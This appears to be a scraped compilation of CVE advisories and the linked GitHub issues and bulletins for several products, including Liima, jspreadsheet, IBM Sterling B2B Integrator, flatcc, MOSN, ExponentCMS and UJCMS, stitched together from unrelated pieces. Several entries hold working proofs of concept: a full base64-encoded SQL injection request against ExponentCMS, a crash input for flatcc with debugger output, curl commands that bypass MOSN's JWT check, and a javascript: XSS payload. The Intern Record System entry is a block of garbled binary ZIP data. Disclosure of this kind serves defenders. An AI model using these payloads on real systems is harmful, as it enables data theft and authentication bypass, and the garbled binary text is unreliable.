Liima before 1.17.28 allows Hibernate query language (HQL) injection, related to colToSort in the deployment filter.

CVE-2023-26093: liima/release-changelog.md at master · liimaorg/liima

Cross Site Scripting (XSS) vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'name' and 'email' parameters, allows attackers to execute arbitrary code.

PKJsSP�UG�intern/config.phpm�\] �0����-z�{��J I6fDĻ��n^vfv�g��~w�H��7��ɒOɏ���Z^�1,��\\j���a���U :'�nf=��ֵ��C#X����kW ���6�42NQ) ��7|��O�v����o>�PK�oPxG�H4intern/controller.phpMPAj�0��El���mӜ��&=�\`���Eeɱ��&��ծKj�vg43�ۡ�D������ka�Q}�#���$M2���ɚח���c�Ƞo����������U3����%~��\\"�Nzß���3e��F�H�Q�h\]�OE�U�hG߃�%;�:�+r �W��D�&�K����D��NƉ ����1��@|���oX?�T�!N��՘�aВB�c����e��,� 8wZOp�+4GJ�����V�^Ys���Y�7-��5M@;���?�w�n��Y�J������V�l�\*� \\ �}�PKl�oP�#ғintern/department.sql�VmS�H�ί��/I�H�\\b�T�aT�����BF�R^�L�r��zH0JH��v�\*���gz���݆�!���0�����Xƙ�n�3�Q�@�3����l1�v\_^^:����$�w�-�邏@�Ua�\` �)D~�Lij\_M����H��l\*��q�redB��Ѱ�15�dv9���nm I�E���1�������u��� ����� �ęNM� �|���wu��'���k�d��ӄ ��e�(H I�o\_z��� @��e�K��H�h &�Il|zZg�oݓ\\�\]Y��C����p,K��m�b'��Ƽ�\`�S���� �^��4Ԡ����m����Ё�~#�@� ���nZտ�m�6���?Su�y����l$QA.7+����ٿ�L�(46��"�s��¢��Aox�{o�oj�(�O���eL�F�z N+e��8��4�8m�"�D�@P�Uc��#�P�V+�+\*��28V4M�xU�WY\*���p�-7����E�Cl?�M\_H�S�S{5�^�w�T7���Tw��r�F��������߷���K��4��{M����6�����J �??���u�R��+�����?\]�������4I�c)2V��E�q�p��������@�ù���ި�z�䜸Ğ����yC��G��ʠT?#훞v�=��ᩆ�v>�79��PK��oPz�J|f� intern/index.php�Wmo�8���Y�h�P�8�$�NP��� �o��ʉg7n�8���3ym�M�'�i\_<3�y��x7ʽV��@O�#��f��W��\]x��5VGa+�(Y\\�E3�7 \]���W1˽/�a:ϳ���|�㝷��D�ȌAx�8X쇙sW���d��ǀ����\]��\*��Q�6nW��+��Qj�2ŝ�Yf �e��A�(f)E\_\[C�����jW���\\�jGB~�\]X��q,̌ ���$ I<�ѳӣ�V�PpMH���<��1\[�5Zk�B�(�F���N�DO����~�N�h��xo4dXw'�i�t�x��\\�uq�\]+�AbP9bx�o�&�!���#Xu�AMs s�} c.��OQ��(J�j2)��8���r��̀܄��ʢ�<�M�Qú�5����U����T<��(�=f'���e%-�)\\)O�~/��q�s��X�|�\_BXt�>��&NG}���~��z����R�.���xR锦Y�ޤR!���\`�hu�7�@��u�?��Uw@�\\ ��qux�a�,�����lY��2���ǡ�����q4��x�H\\9��Ak�WM\`�Ϩ���c˩)�>sU��SB:�\*�z�J\]�Cw@k?��n� ��#�LU��Ȱ��Wr��r��6�K� ���e�v��Cۊ'������3xo?}xb)���ͺ��|�����}��,\_�&ۭ!��}��>�zN~t�RDGq �GR<��(��A#�u�k�m�2�÷i�4�(l#�>u�s��'O�x�\[�������I�p�I�TK?��@�@p{��r��63�� ��\_���D���Sc�?���O0���O��ݴ , k �ɕp��\_Ea�G��K�m�?v�PK:SP���Tintern/view.php�UK��0�/�"���6\]��k'�֥���.�P�H�JYr$�KX��+�������\`�O��h�� w��\]^ ?�5��\\ �Bd���J��a� ,S̝+�M\[G�$�G��u������"��ut����{,\*�gY��a��n���n�QLB'j7%O,4ۢv����Jbm��V��5m(�,$��zR�\_1bVGɹ��5h:HCE��BX�g�HI��jV!r�p���}%1��z<�M#���D�~��r� ׊B��R��<ߞRGv-�b��"\_o�l'#o�^�ه��=z���}��=:0\*g��Oo\[)�&#��Z�Kp��^5M'!�t�|j���G�|v�Zt�� 4Pe6K�i��w�������.�MrB� �\`vd޳Q�\*5�\_�f���j�c��\\��C�x{����S�2�<�^k�Zѷ��\]�K�u�q%��(~CW��umvr6�y\_�O�����1� p�f\]�g�9��bU���兿����7PKJsSP�UG� intern/config.phpPK�oPxG�H4 �intern/controller.phpPKl�oP�#ғ )intern/department.sqlPK��oPz�J|f�  �intern/index.phpPK:SP���T � intern/view.phpPK@�

CVE-2022-40348

The dropdown menu in jspreadsheet before v4.6.0 was discovered to be vulnerable to cross-site scripting (XSS).

**Cross-site Scripting in jspreadsheet**

Moderate severity GitHub Reviewed Published Feb 18, 2023 to the GitHub Advisory Database • Updated Feb 18, 2023

GHSA-q82h-q47j-f492: Cross-site Scripting in jspreadsheet

Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 10 and Feb. 17.

Threat Round up for February 10 to February 17

IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.7 and 6.1.0.0 through 6.1.2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 238684.

  

**Summary**

IBM Sterling B2B Integrator has addressed the cross-site scripting security vulnerability.

**Vulnerability Details**

**CVEID:**   CVE-2022-43579  
**DESCRIPTION:**   IBM Sterling B2B Integrator Standard Edition is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 4.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/238684 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Sterling B2B Integrator

6.0.0.0 - 6.0.3.7

IBM Sterling B2B Integrator

6.1.0.0 - 6.1.2.0

  

**Remediation/Fixes**

**Product  
**

**Version**

**APAR**

**Remediation & Fix**

IBM Sterling B2B Integrator

6.0.0.0 - 6.0.3.7

IT42394

Apply 6.0.3.8

IBM Sterling B2B Integrator

6.1.0.0 - 6.1.2.0

IT42394

Apply 6.1.2.1

The IIM versions of 6.0.3.8 and 6.1.2.1 are available on Fix Central. 

The container version of 6.1.2.1 is available in IBM Entitled Registry with following tags.  

*   cp.icr.io/cp/ibm-b2bi/b2bi:6.1.2.1 for IBM Sterling B2B Integrator
*   cp.icr.io/cp/ibm-sfg/sfg:6.1.2.1 for IBM Sterling File Gateway

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

10 Feb 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS3JSW","label":"IBM Sterling B2B Integrator"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"},{"code":"PF002","label":"AIX"}\],"Version":"6.0.0.0 - 6.1.2.1","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}}\]

CVE-2022-43579: Security Bulletin: IBM Sterling B2B Integrator is vulnerable to cross-site scripting (CVE-2022-43579)

Buffer Overflow vulnerability in Dvidelabs flatcc v.0.6.0 allows local attacker to execute arbitrary code via the fltacc execution of the error_ref_sym function.

in parser.c  
k seems like the size of the rest of buffer on stack(var 'buf' which type is char\[\]).  
n is memcpy size as 3rd para.  
while condition k>0 to keep buffer is not full.  
if enter in if(k<n) branch n=k,var n is assigned the value of k  
then k -=n ,var k is assigned the value 0  
then --k, var k is assigned the value 0xffffffffffffffff while var k's type is size\_t.  
so the while conditionk > 0 not make sense.  
next memcpy will lead to stack overflow

void error\_ref\_sym(fb\_parser\_t \*P, fb\_ref\_t \*ref, const char \*msg, fb\_symbol\_t \*s2)
{
    fb\_ref\_t \*p;
    char buf\[FLATCC\_MAX\_IDENT\_SHOW + 1\];
    size\_t k = FLATCC\_MAX\_IDENT\_SHOW;
    size\_t n = 0;
    size\_t n0 = 0;
    p = ref;
    while (p && k > 0) {
        n = (size\_t)p->ident\->len;
        if (k < n) {
            n = k;
        }
        memcpy(buf + n0, p->ident\->text, n);
        k -= n;
        n0 += n;
        buf\[n0\] = '.';
        --k; //overflow here when k = 0
        ++n0;
        p = p->link;
    }
    buf\[n0\] = '\\0';
    if (n0 > 0) {
        --n0;
    }
    if (k <= 0) {
        memcpy(buf + FLATCC\_MAX\_IDENT\_SHOW + 1 - 4, "...\\0", 4);
        n0 = FLATCC\_MAX\_IDENT\_SHOW;
    }
    error\_report(P, ref->ident, msg, s2 ? s2->ident : 0, buf, n0);
}

poc:

    ➜  fuzz_test cat test9
    struct tsj{
            damage:shortllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllve.tlllllllllllllllllllllllllllllllllllllll;
    }
    ➜  fuzz_test ../flatcc/bin/flatcc test9
    test9:2:9: error: 'shortlllllllllllllllllllllllllllllllllllllllllllll.tlllllllllllllllllllllllllllllllllllllll': unknown type reference used with struct field: test9:2:2: 'damage'
    *** stack smashing detected ***: terminated
    [1]    3685 abort (core dumped)  ../flatcc/bin/flatcc test9
    ➜  fuzz_test
    

    ➜  fuzz_test gdb ../flatcc/bin/flatcc
    GNU gdb (Ubuntu 9.2-0ubuntu1~20.04) 9.2
    Copyright (C) 2020 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.
    Type "show copying" and "show warranty" for details.
    This GDB was configured as "x86_64-linux-gnu".
    Type "show configuration" for configuration details.
    For bug reporting instructions, please see:
    <http://www.gnu.org/software/gdb/bugs/>.
    Find the GDB manual and other documentation resources online at:
        <http://www.gnu.org/software/gdb/documentation/>.
    
    For help, type "help".
    Type "apropos word" to search for commands related to "word"...
    pwndbg: loaded 196 commands. Type pwndbg [filter] for a list.
    pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
    Reading symbols from ../flatcc/bin/flatcc...
    pwndbg> set args test9
    pwndbg> r
    Starting program: /mnt/c/Users/tsj/Desktop/flatcc/bin/flatcc test9
    test9:2:9: error: 'shortlllllllllllllllllllllllllllllllllllllllllllll.tlllllllllllllllllllllllllllllllllllllll': unknown type reference used with struct field: test9:2:2: 'damage'
    *** stack smashing detected ***: terminated
    
    Program received signal SIGABRT, Aborted.
    __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    50      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ─────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────────────
     RAX  0x0
     RBX  0x7fffff7e13c0 ◂— 0x7fffff7e13c0
     RCX  0x8
     RDX  0x0
     RDI  0x2
     RSI  0x7ffffffed990 ◂— 0x0
     R8   0x0
     R9   0x7ffffffed990 ◂— 0x0
     R10  0x8
     R11  0x8
     R12  0x7ffffffedc10 ◂— 0x642ccf000a276567 /* "ge'\n" */
     R13  0x20
     R14  0x7fffff510000 ◂— 0x202a2a2a00001000
     R15  0x1
     RBP  0x7ffffffedd10 —▸ 0x7fffff76a07c ◂— '*** %s ***: terminated\n'
     RSP  0x7ffffffed990 ◂— 0x0
     RIP  0x7fffff5f618b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
    ───────────────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────────────
     ► 0x7fffff5f618b <raise+203>    mov    rax, qword ptr [rsp + 0x108]
       0x7fffff5f6193 <raise+211>    xor    rax, qword ptr fs:[0x28]
       0x7fffff5f619c <raise+220>    jne    raise+260 <raise+260>
        ↓
       0x7fffff5f61c4 <raise+260>    call   __stack_chk_fail <__stack_chk_fail>
    
       0x7fffff5f61c9                nop    dword ptr [rax]
       0x7fffff5f61d0 <killpg>       endbr64
       0x7fffff5f61d4 <killpg+4>     test   edi, edi
       0x7fffff5f61d6 <killpg+6>     js     killpg+16 <killpg+16>
    
       0x7fffff5f61d8 <killpg+8>     neg    edi
       0x7fffff5f61da <killpg+10>    jmp    kill <kill>
    
       0x7fffff5f61df <killpg+15>    nop
    ───────────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────────
    00:0000│ rsi r9 rsp 0x7ffffffed990 ◂— 0x0
    01:0008│            0x7ffffffed998 —▸ 0x7ffffffedb48 ◂— 0x3000000030 /* '0' */
    02:0010│            0x7ffffffed9a0 —▸ 0x7ffffffedb60 ◂— "test9:2:9: error: 'shortlllllllllllllllllllllllllllllllllllllllllllll.tlllllllllllllllllllllllllllllllll"
    03:0018│            0x7ffffffed9a8 —▸ 0x7fffff63f11a (__vsnprintf_internal+170) ◂— mov    r9, qword ptr [rsp + 8]
    04:0020│            0x7ffffffed9b0 ◂— 0x3
    05:0028│            0x7ffffffed9b8 —▸ 0x7ffffffedab0 ◂— 0x20 /* ' ' */
    06:0030│            0x7ffffffed9c0 ◂— 0xfbad8001
    07:0038│            0x7ffffffed9c8 —▸ 0x7ffffffedb60 ◂— "test9:2:9: error: 'shortlllllllllllllllllllllllllllllllllllllllllllll.tlllllllllllllllllllllllllllllllll"
    ─────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────────
     ► f 0   0x7fffff5f618b raise+203
       f 1   0x7fffff5d5859 abort+299
       f 2   0x7fffff6403ee __libc_message+670
       f 3   0x7fffff6e2b4a __fortify_fail+42
       f 4   0x7fffff6e2b16
       f 5        0x8073af9
       f 6        0x80976b9 __flatcc_fb_build_schema+21961
       f 7        0x80976b9 __flatcc_fb_build_schema+21961
    ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg>

CVE-2021-33983: found a integer overflow leads to stack_overflow  · Issue #188 · dvidelabs/flatcc

Authentication vulnerability in MOSN v.0.23.0 allows attacker to escalate privileges via case-sensitive JWT authorization.

**Describe the bug**

When using JWT authorization, it is case-sensitive to the prefix that the URL matches, which can lead to authentication bypassing in some scenarios.

It is recommended to apply URL normalization and employ case-insensitive comparison in order to eliminate the risk of potential access control list bypasses.

**Expected behavior**

Be intercepted by jwtauthn

**Actual behavior**

Bypass the intercept

**Steps to reproduce**

config.js

    ......
    "rules": [
                 {
                         "match": {
                         "prefix": "/index"
                 },
    ......
    

NodeJS with Express

    curl http://127.0.0.1:2046/index -s -o /dev/null  -H "Authorization: Bearer token" -w "%{http_code}\n" 
    401
    

    curl http://127.0.0.1:2046/indeX -s -o /dev/null  -H "Authorization: Bearer token" -w "%{http_code}\n"
    200
    

**Minimal yet complete reproducer code (or GitHub URL to code)****Environment**

*   MOSN Version

According to RFC3986, only the host, sheme, and hexadecimal digits should be case-insensitive. The other generic syntax components are assumed to be case-sensitive.

So, by default, the prefix "/index" should not match with "/indeX"

Yes, that's true for RFC3986, but the conventions generally use all lowercase paths.

As MOSN is a general network proxy, I think its function of authenticating the matching path needs to support the differences of most applications to the greatest extent.

Personally, I suggest that case-insensitive matching be enabled by default, and users can configure it by themselves.

If the default is case-sensitive, it is best to remind users of possible risks.

Is there any documentation about your mentioned _conventions_?

I referred to the Envoy JWT Authentication module, but found that its match is also case-sensitive by default. Or am I wrong with some places?

And we do need to provide the ability to configure whether case-sensitive or not by users.

That's what @GLYASAI is doing right now in #1637

CVE-2021-32163: case sensitive in jwtauthn match prefix · Issue #1633 · mosn/mosn

SQL Injection vulnerability in Exponent-CMS v.2.6.0 fixed in 2.7.0 allows attackers to gain access to sensitive information via the selectValue function in the expConfig class.

**Vulnerability Info****Vulnerability Type**

ExponentCMS unauthticate sql injection

**Vulnerability Version**

v2.6.0

exponentcms/exponent-cms#1542

**Recurring environment**

*   Windows 10\* PHP 5.4.5\* Apache 2.4.23

**Author**

pang0lin@webray.com.cn inc.

**Vulnerability Description AND recurrence:**

1.  The security issue is occured at file \\framework\\modules\\eaas\\controllers\\eaasController.php The line number nearby 76.
    
        public function api() {
             if (empty($this->params['apikey'])) {
                 $_REQUEST['apikey'] = true;  // set this to force an ajax reply
                 $ar = new expAjaxReply(550, 'Permission Denied', 'You need an API key in order to access Exponent as a Service', null);
                 $ar->send();  //FIXME this doesn't seem to work correctly in this scenario
             } else {
                 $key = expUnserialize(base64_decode(urldecode($this->params['apikey'])));  //step 1
                 if (is_object($key) && $key->mod === "eaas") {
                     preg_match('/[a-zA-Z0-9_@]*/', $key->src, $matches);
                     $key->src = $matches[0];
                     // var_dump($key);
                     $cfg = new expConfig($key); // step 2
                     $this->config = $cfg->config;
                     $cfg = new expConfig($key);
                     $this->config = $cfg->config;
                 }
                 if(empty($cfg->id)) {
                     $ar = new expAjaxReply(550, 'Permission Denied', 'Incorrect API key or Exponent as a Service module configuration missing', null);
                     $ar->send();
                 } else {
                     if (!empty($this->params['get'])) {
                         $this->handleRequest();
                     } else {
                         $ar = new expAjaxReply(200, 'ok', 'Your API key is working, no data requested', null);
                         $ar->send();
                     }
                 }
             }
         }
        
    

2.  We can see issue with steps. step 1. The user's input apikey can be decoded with base64 and serilized.

step 2. The key goes into class of 'expConfig'. we try to find the definition.

        class expConfig extends expRecord {
    	protected $table = 'expConfigs';
    
    	function __construct($params=null) {
    		global $db;
    
            if (!is_array($params)) {
                $this->location_data = serialize($params);
                parent::__construct($db->selectValue($this->table, 'id', "location_data='".$this->location_data."'"));  //step 3
            } else {
                parent::__construct($params);
            }
    
    		// treat the loc data like an id - if the location data come thru as an object we need to look up the record
                //         if (!empty($params->src)) {
                //             echo "1";
                //             // if we hav a src, ie this controller has sources
                // parent::__construct($db->selectValue($this->table, 'id', "location_data='".$this->location_data."'"));
                //         } else {
                //             echo "2";
                //             // if we don't have a sourced controller, might still have a config for it.
                // parent::__construct($db->selectValue($this->table, 'id'));
                //}
    		$this->config = expUnserialize($this->config);
            if (!is_array($this->config)) {
                $this->config = array();
            }
            // now to artificially attach any file objects to the config
            if (!empty($this->config['expFile'])) {
                foreach ($this->config['expFile'] as $type=>$file) {
                    if (is_array($file)) foreach ($file as $key=>$filenum) {
                        if (is_numeric($filenum)) {
                            $this->config['expFile'][$type][$key] = new expFile($filenum);
                        } elseif (!is_object($filenum)) {
                            unset($this->config['expFile'][$type][$key]);
                        }
                    }
                }
            }
    	}
    

3.  At step 3. We can see the variable '$this->location\_data' derectly use by function 'selectValue' without any filter.Try to find the definition.

            /**
        * @param  $table
        * @param  $col
        * @param null $where
        * @return null
        */
       function selectValue($table, $col, $where=null) {
           if ($where == null)
               $where = "1";
           $sql = "SELECT " . $col . " FROM `" . $this->prefix . "$table` WHERE $where LIMIT 0,1";  //step 4
      
           $res = @mysqli_query($this->connection, $sql);
    
           if ($res == null)
               return null;
           $obj = mysqli_fetch_object($res);
           if (is_object($obj)) {
               return $obj->$col;
           } else {
               return null;
           }
       }
    

4.  Now. it's clearly to understand the issue. The user input is like . $a = new eaasController();$a->mod = 'eaas';$a->src="aaaaaabbbb";$a->abc="1' union select sleep(5) -- a";var\_dump(urlencode(base64\_encode(serialize($a)))); then, we can use this payload to test if the target is vulnerable. If the target is vulnerable, the request will use more than 10s.

    POST /index.php HTTP/1.1
    Host: exponentcms.org
    
    controller=eaas&action=api&get=photos&apikey=TzoxNDoiZWFhc0NvbnRyb2xsZXIiOjI4OntzOjExOiJ1c2VyYWN0aW9ucyI7YToxOntzOjc6InNob3dhbGwiO3M6MTk6Ikluc3RhbGwgU2VydmljZSBBUEkiO31zOjE0OiJyZW1vdmVfY29uZmlncyI7YToxMDp7aTowO3M6MTE6ImFnZ3JlZ2F0aW9uIjtpOjE7czoxMDoiY2F0ZWdvcmllcyI7aToyO3M6ODoiY29tbWVudHMiO2k6MztzOjc6ImVhbGVydHMiO2k6NDtzOjg6ImZhY2Vib29rIjtpOjU7czo1OiJmaWxlcyI7aTo2O3M6MTA6InBhZ2luYXRpb24iO2k6NztzOjM6InJzcyI7aTo4O3M6NDoidGFncyI7aTo5O3M6NzoidHdpdHRlciI7fXM6NDoidGFicyI7YTo3OntzOjc6ImFib3V0dXMiO3M6ODoiQWJvdXQgVXMiO3M6NDoiYmxvZyI7czo0OiJCbG9nIjtzOjU6InBob3RvIjtzOjY6IlBob3RvcyI7czo1OiJtZWRpYSI7czo1OiJNZWRpYSI7czo1OiJldmVudCI7czo2OiJFdmVudHMiO3M6MTI6ImZpbGVkb3dubG9hZCI7czoxNDoiRmlsZSBEb3dubG9hZHMiO3M6NDoibmV3cyI7czo0OiJOZXdzIjt9czo3OiIAKgBkYXRhIjthOjA6e31zOjEyOiIAKgBjbGFzc25hbWUiO3M6MTQ6ImVhYXNDb250cm9sbGVyIjtzOjEzOiJiYXNlY2xhc3NuYW1lIjtzOjQ6ImVhYXMiO3M6OToiY2xhc3NpbmZvIjtOO3M6MTQ6ImJhc2Vtb2RlbF9uYW1lIjtzOjk6ImV4cFJlY29yZCI7czoxMToibW9kZWxfdGFibGUiO047czoxNDoiACoAcGVybWlzc2lvbnMiO2E6NTp7czo2OiJtYW5hZ2UiO3M6NjoiTWFuYWdlIjtzOjk6ImNvbmZpZ3VyZSI7czo5OiJDb25maWd1cmUiO3M6NjoiY3JlYXRlIjtzOjY6IkNyZWF0ZSI7czo0OiJlZGl0IjtzOjQ6IkVkaXQiO3M6NjoiZGVsZXRlIjtzOjY6IkRlbGV0ZSI7fXM6MTY6IgAqAG1fcGVybWlzc2lvbnMiO2E6Njp7czo4OiJhY3RpdmF0ZSI7czo4OiJBY3RpdmF0ZSI7czo3OiJhcHByb3ZlIjtzOjc6IkFwcHJvdmUiO3M6NToibWVyZ2UiO3M6NToiTWVyZ2UiO3M6NjoicmVyYW5rIjtzOjY6IlJlUmFuayI7czo2OiJpbXBvcnQiO3M6MTI6IkltcG9ydCBJdGVtcyI7czo2OiJleHBvcnQiO3M6MTI6IkV4cG9ydCBJdGVtcyI7fXM6MjE6IgAqAHJlbW92ZV9wZXJtaXNzaW9ucyI7YTowOnt9czoxODoiACoAYWRkX3Blcm1pc3Npb25zIjthOjA6e31zOjIxOiIAKgBtYW5hZ2VfcGVybWlzc2lvbnMiO2E6MDp7fXM6MTQ6InJlcXVpcmVzX2xvZ2luIjthOjA6e31zOjg6ImZpbGVwYXRoIjtzOjgwOiIvcGhwc3R1ZHlfcHJvL1dXVy9leHBvbmVudC9mcmFtZXdvcmsvbW9kdWxlcy9lYWFzL2NvbnRyb2xsZXJzL2VhYXNDb250cm9sbGVyLnBocCI7czo4OiJ2aWV3cGF0aCI7czo2MDoiL3BocHN0dWR5X3Byby9XV1cvZXhwb25lbnQvZnJhbWV3b3JrL21vZHVsZXMvZWFhcy92aWV3cy9lYWFzIjtzOjE3OiJyZWxhdGl2ZV92aWV3cGF0aCI7czoxNToiZWFhcy92aWV3cy9lYWFzIjtzOjEwOiJhc3NldF9wYXRoIjtzOjQwOiIvZXhwb25lbnQvZnJhbWV3b3JrL21vZHVsZXMvZWFhcy9hc3NldHMvIjtzOjY6ImNvbmZpZyI7YTowOnt9czo2OiJwYXJhbXMiO2E6MDp7fXM6MzoibG9jIjtPOjg6InN0ZENsYXNzIjozOntzOjM6Im1vZCI7czo0OiJlYWFzIjtzOjM6InNyYyI7czowOiIiO3M6MzoiaW50IjtzOjA6IiI7fXM6MTE6ImNvZGVxdWFsaXR5IjtzOjY6InN0YWJsZSI7czoxNDoicnNzX2lzX3BvZGNhc3QiO2I6MDtzOjQ6ImVhYXMiO086OToiZXhwUmVjb3JkIjoyMzp7czoxMjoiACoAY2xhc3NpbmZvIjtOO3M6OToiY2xhc3NuYW1lIjtzOjk6ImV4cFJlY29yZCI7czo5OiJ0YWJsZW5hbWUiO3M6OToiZXhwUmVjb3JkIjtzOjEwOiJpZGVudGlmaWVyIjtzOjI6ImlkIjtzOjEzOiJyYW5rX2J5X2ZpZWxkIjtzOjA6IiI7czoxMjoiZ3JvdXBpbmdfc3FsIjtzOjA6IiI7czoxOToiaGFzX2V4dGVuZGVkX2ZpZWxkcyI7YTowOnt9czo3OiJoYXNfb25lIjthOjA6e31zOjg6Imhhc19tYW55IjthOjA6e31zOjEzOiJoYXNfbWFueV9zZWxmIjthOjA6e31zOjIzOiJoYXNfYW5kX2JlbG9uZ3NfdG9fbWFueSI7YTowOnt9czoyMzoiaGFzX2FuZF9iZWxvbmdzX3RvX3NlbGYiO2E6MDp7fXM6MTg6ImRlZmF1bHRfc29ydF9maWVsZCI7czowOiIiO3M6MjI6ImRlZmF1bHRfc29ydF9kaXJlY3Rpb24iO3M6MDoiIjtzOjEzOiJnZXRfYXNzb2NfZm9yIjthOjA6e31zOjI0OiIAKgBhdHRhY2hhYmxlX2l0ZW1fdHlwZXMiO2E6MDp7fXM6MjQ6ImF0dGFjaGFibGVfaXRlbXNfdG9fc2F2ZSI7TjtzOjE4OiJnZXRfYXR0YWNoYWJsZV9mb3IiO2E6MDp7fXM6ODoidmFsaWRhdGUiO2E6MDp7fXM6OToidmFsaWRhdGVzIjthOjA6e31zOjE1OiJkb19ub3RfdmFsaWRhdGUiO2E6MDp7fXM6MTg6InN1cHBvcnRzX3JldmlzaW9ucyI7YjowO3M6MTQ6Im5lZWRzX2FwcHJvdmFsIjtiOjA7fXM6MzoibW9kIjtzOjQ6ImVhYXMiO3M6Mzoic3JjIjtzOjEwOiJhYWFhYWFiYmJiIjtzOjM6ImFiYyI7czoyOToiMScgdW5pb24gc2VsZWN0IHNsZWVwKDUpIC0tIGEiO30%3D

CVE-2021-32441: CVEproject/ExponentCMS_v2.6.0_sqli.md at main · pang0lin/CVEproject

The WP Coder – add custom html, css and js code plugin for WordPress is vulnerable to time-based SQL Injection via the ‘id’ parameter in versions up to, and including, 2.5.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with administrative privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVE-2023-0895

A cross-site scripting (XSS) vulnerability in UJCMS v4.1.3 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the URL parameter under the Add New Articles function.

Hello, I found that when ujcms V4.1.3 of your company added articles in the background, the redirection link was selected, and the url was not verified when the new window was opened without checking the check box. javascript pseudo-protocol is used to carry out cross-site attack. When the viewer clicks on the article, the cross-site attack is triggered. The user's browser control permissions and sensitive information can be obtained in this way.

Specific steps: When adding new articles, turn to the url and input javascript:alert(1). Click Save. When clicking the new articles in the foreground, js events can be triggered.  
  

Suggestion: If you want to add a forward link, verify the location of the forward url in the system, for example, limit it to HTTP or HTTPS.

Tag

#js